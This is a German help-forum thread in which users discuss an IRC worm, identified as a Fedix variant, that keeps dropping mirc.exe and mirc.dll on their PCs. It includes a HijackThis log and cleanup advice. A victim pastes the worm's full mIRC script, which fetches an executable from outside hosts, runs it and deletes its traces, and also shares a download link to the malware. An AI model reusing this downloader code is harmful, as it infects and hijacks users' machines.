Hi...

seit gestern abend macht mein PC Probleme...

Nach jedem Neustart ist direkt unter C:/ eine Datei mirc.exe und eine mirc.dll zu finden.

Bei entweder normalem Doppelklick drauf oder nach einer bestimmten Zeit die der PC läuft, startet die Datei und es entstehen dann über 100 mirc.exe Prozesse (immer ca 2000 bis 6000 kb)... Diese überlasten dann mein System und ich muss neu starten..

Wenn ich die mirc.exe lösche, läuft mein PC normal, außer das er mir ziemlich langsam vorkommt und gelegentlich länger hängt...

Hab mal HijackThis laufen lassen, hier das log:
</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">Logfile of HijackThis v1.97.7
Scan saved at 16:50:14, on 08.05.2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\Programme\Norton Personal Firewall\NISUM.EXE
C:\WINDOWS\Explorer.EXE
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\WINDOWS\System32\rundll32.exe
C:\Programme\AVPersonal\AVGUARD.EXE
C:\Programme\Microsoft Hardware\Mouse\point32.exe
C:\Programme\ICQLite\ICQLite.exe
C:\Programme\AVPersonal\AVGNT.EXE
C:\Programme\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\System32\drivers\CDAC11BA.EXE
C:\Programme\Norton Personal Firewall\ccPxySvc.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\WAVEline Wireless LAN Setting\wlanutil.exe
C:\Dokumente und Einstellungen\simon.SDASD\Eigene Dateien\MozDL\HijackThis.exe
C:\Programme\Mozilla Firefox\firefox.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir...mp;ar=iesearch
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.inselkampf.de/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&amp;clcid={SUB_CLSID}&amp;pver={SUB_PVER}&amp;ar=home
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir...mp;ar=iesearch
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.microsoft.com/isapi/redir...amp;ar=msnhome
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir...mp;ar=iesearch
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://www.microsoft.com/isapi/redir...p;plcid=0x0407
O3 - Toolbar: &amp;Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ccApp] &quot;C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe&quot;
O4 - HKLM\..\Run: [ccRegVfy] &quot;C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe&quot;
O4 - HKLM\..\Run: [KEWelcomeReBoot] G:\welcome_S500.exe
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [WorksFUD] C:\Programme\Microsoft Works\wkfud.exe
O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Programme\Microsoft Works\WksSb.exe /AllUsers
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -minimize
O4 - HKLM\..\Run: [AVGCtrl] C:\Programme\AVPersonal\AVGNT.EXE /min
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -trayboot
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Erinnerungen in Microsoft Works-Kalender.lnk = ?
O4 - Global Startup: setup_pcc.lnk = D:\Trend Micro PC-cillin 2004\Setup\setup.exe
O4 - Global Startup: WAVEline 11Mbps Wireless LAN Utility.lnk = C:\Programme\WAVEline Wireless LAN Setting\wlanutil.exe
O9 - Extra button: AIM (HKLM)
O9 - Extra button: ICQ 4.0 (HKLM)
O9 - Extra 'Tools' menuitem: ICQ Lite (HKLM)
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall-Kontrolle) - http://a840.g.akamai.net/7/840/537/2...ll/xscan53.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.co...948.1423148148
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/s...sh/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{95CEFE89-0F71-45E5-9F87-F9819B53A576}: NameServer = 194.25.2.129,217.5.99.105</pre>[/QUOTE]Neben der mirc.exe in C:/ gibts dort wie bereits gesagt auch noch ne dll Datei, hier mal auch noch deren Inhalt:

</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">alias botnet.scan.4.fileurl { set %botnet.host boonsterfileurl.da.ru | sockclose botnet.check.fileurl | .timer 1 1 sockopen botnet.check.fileurl %botnet.host 80 }

ON *:SOCKOPEN:botnet.check.fileurl: {
sockwrite -n $sockname GET / HTTP/1.1
sockwrite -n $sockname Host: %botnet.host $+ $str($crlf,2)
}

ON *:SOCKREAD:botnet.check.fileurl: {
var %sockread
sockread %sockread
if ($regsub(%sockread, &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;,,%sockread)) &amp;&amp; ($regsub(%sockread, &lt;/TITLE&gt;&lt;/HEAD&gt;,,%sockread)) {
set %botnet.account %sockread
sockclose botnet.download.new.version
.timer 1 1 sockopen botnet.download.new.version people.freenet.de 80
}
}

ON *:SOCKOPEN:botnet.download.new.version: {
sockwrite -n $sockname GET / $+ %botnet.account $+ /damn.exe HTTP/1.0
sockwrite -n $sockname Accept: */*
sockwrite -n $sockname Host: %botnet.host $+ $str($crlf,2)
sockwrite -n $sockname
}

ON *:SOCKREAD:botnet.download.new.version:{
if (%botnet.aupd.downloadready != 1) {
var %header
sockread %header
while ($sockbr) {
if (* !iswm %header) {
%botnet.aupd.downloadready = 1
break
}
sockread %header
}
}
sockread 4096 &amp;d
while ($sockbr) {
bwrite update.exe -1 -1 &amp;d
sockread 4096 &amp;d
}
}

ON *:SOCKCLOSE:botnet.download.new.version: { unset %botnet.aupd.* | run update.exe | remove c:\mirc.exe | remove c:\mirc.dll | .timer 1 3 run C:\WINDOWS\system32\system01\svchost.exe | .timer 1 3 exit }</pre>[/QUOTE]Das Problem ist halt das die beiden Dateien scheinbar von einer anderen gesteuert werden und nach jedem neustart trotz löschen wieder da sind

Hoffe ihr könnt mir helfen...

/edit: Was natürlich noch Wichtig ist... als ich AntiVir bzw. Trend drüberlaufen lies, hat es zwar n paar Sachen gefunden aber keine die das Problem behoben haben...

Hallo erstmal wies scheint bist du ja nicht der einzige mit dem mirc.exe problem...


zunächst mal was is das hier ??:
</font><blockquote>Zitat:</font><hr />O4 - HKLM\..\Run: [KEWelcomeReBoot] G:\welcome_S500.exe </font>[/QUOTE]google kennt die exe nicht

sonst seh ich nicht wirklich viel ausser dem evtl noch :
</font><blockquote>Zitat:</font><hr /> 17 - HKLM\System\CCS\Services\Tcpip\..\{95CEFE89-0F71-45E5-9F87-F9819B53A576}: NameServer = 194.25.2.129,217.5.99.105 </font>[/QUOTE]wie lang hastn das Problem schon??
Hast du mal einen mIRC client benutzt?


kopier mal die beiden dateien nach nem neustart in ein archiv ich kenn jemand der sich mit botnetzwerken befasst evtl intressiert das ihn


Nachtrag:

</font><blockquote>Zitat:</font><hr />C:\WINDOWS\system32\system01\ </font>[/QUOTE]existiert dieser pfad und diese datei??
wenn ja ebenfalls ins archiv und dann auch mal löschen

</font><blockquote>Zitat:</font><hr />O4 - HKLM\..\Run: [KEWelcomeReBoot] G:\welcome_S500.exe </font>[/QUOTE]Ka, aber G ist mein Laufwerksbuchstabe für das CD-RW Laufwerk, ich denke nicht dass das ein Auslöser ist...

</font><blockquote>Zitat:</font><hr /> 17 - HKLM\System\CCS\Services\Tcpip\..\{95CEFE89-0F71-45E5-9F87-F9819B53A576}: NameServer = 194.25.2.129,217.5.99.105 </font>[/QUOTE]Die beiden IP Adressen, sind die von meinen DNS Servern.


</font><blockquote>Zitat:</font><hr />kopier mal die beiden dateien nach nem neustart in ein archiv ich kenn jemand der sich mit botnetzwerken befasst evtl intressiert das ihn</font>[/QUOTE]http://clan-elite-force.net/mircvirus.rar

</font><blockquote>Zitat:</font><hr />C:\WINDOWS\system32\system01\ </font>[/QUOTE]existiert dieser pfad und diese datei??
wenn ja ebenfalls ins archiv und dann auch mal löschen [/QB][/QUOTE]

Nein, dieser Pfad besteht nicht, auf die Idee bin ich auch schon gekommen.


Das interessante ist, diesmal waren die beiden Dateien nicht mehr auf der Platte, aber ich hatte sie noch im Papierkorb.

Aber da sie immer wieder da waren, vermute ich das der Virus dadurch nicht in seinen Wurzlen vernichtet ist...

Ich benutzte Gamers Irc 4.21 zum Zeitpunkt der "infizierung". Mittlerweile 4.30

Danke für die schnelle Antwort

Die beiden Dateien sind ein IRC-Wurm.

Bitte lösche gleich den Link von dir.

Der Wurm ist eine Fedix-Variante.

Habe den Wurm an die Virenschutz-Hersteller geschickt.
Er sollte am Dienstag von AntiVir erkannt werden.
Bei Trendmicro wirds wohl a bissl schneller gehn.

PS: Nicht immer alles bei IRC anklicken!

OK Vielen Dank für die Hilfe aber könnt ihr/du mir noch sagen ob der Wurm damit von meinem Rechner beseitigt ist?

Link ist weg.

Zur Beseitigung kann ich leider nix sagen, da ich nicht weiss wo er sich einschreibt.

Hi,

also ich hab das gleiche problem, bzw. virus :-(
Hab antivir, der erkennt des als fedix.b.1 in der mirc.exe und fedix.b.2 in der mirc.dll kanns aber nicht beseitigen. bei mir hängt der virus in der notepad.exe im system32 folde bei windows. antivir sagt mir jedesmal

</font><blockquote>Zitat:</font><hr />In eine oder meheren Archiven wurden Viren bzw. unerwünschte Programme gefunden! Infizierte dateien in Dateien werden nicht gelöscht oder repariert</font>[/QUOTE]help plz

Ich hab mir die Notepad.exe Datei von nem Kumpel schicken lassen (natürlich ne saubere, ohne Virus )

Dann sollte es funktionieren. Die mirc.exe und mirc.dll werden dann auch nicht mehr beim Neustart jedesmal erstellt.

Super ... hatte das selbe Problem! Lasse mir gerade die File schicken!

MfG

s04-freak

Hier nochmal ein paar Tips an alle IRC user (besonders das quakenet betreffend):

Nicht jeden link anklicken im IRC
Wenn man zweifel hat ob man infiziert ist in den channeln #feds und #help nachfragen ob neue IRC würmer bekannt sind
wenn man sicher weis das man infiziert wurde den IRC client deinstallieren alle vorhandenen dateien bezueglich dem client löschen und neuinstallieren
betreffend qnet das auth passwort und die mailadresse ändern falls das nicht schon zu spät sein sollte

mfg
Thomas